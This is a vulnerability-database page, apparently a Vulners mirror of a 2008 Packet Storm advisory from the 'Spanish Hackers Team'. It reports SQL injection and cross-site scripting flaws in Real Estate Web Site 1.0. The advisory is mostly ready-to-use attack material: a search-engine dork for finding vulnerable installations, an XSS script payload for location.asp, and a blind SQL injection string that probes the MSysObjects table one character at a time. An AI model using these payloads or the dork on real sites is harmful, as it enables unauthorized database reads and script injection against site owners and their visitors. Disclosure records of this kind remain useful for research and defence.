Lucene search

K

realestate-sqlxss.txt

🗓️ 09 Jun 2008 00:00:00Reported by JosSType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

Real Estate Web Site 1.0 has high-risk SQL injection and Cross Site Scripting vulnerabilities.

Show more
Code
`--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--  
--==+ Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities +==--  
--==+====================================================================================+==--  
- dreaming of necessity is reason to comply -  
  
  
[+] Info:  
  
[~] Bug found by JosS  
[~] sys-project[at]hotmail.com  
[~] http://www.spanish-hackers.com  
[~] EspSeC & Hack0wn!.  
  
[~] Software: Real Estate Web Site 1.0  
[~] HomePage: http://www.real-estate-website.org/  
[~] Exploit: Multiple Remote Vulnerabilities [High]  
  
[~] Dork: "powered by real-estate-website"  
  
[+] Cross Site Scripting:  
  
[~] Vuln file: location.asp  
[~] Exploit: http://localhost/PATH/location.asp?name=[XSS]  
[~] Example: http://localhost/PATH/location.asp?name="><script>alert('JosS')</script>  
  
[+] Remote SQL Injection:  
  
[~] Vuln file: location.asp  
[~] Exploit: http://localhost/PATH/location.asp?name=JosS&location=[SQL]  
[~] Example: IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00  
  
  
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--  
--==+ JosS +==--  
--==+====================================================================================+==--  
[+] [The End]  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
09 Jun 2008 00:00Current
7.4High risk
Vulners AI Score7.4
14
.json
Report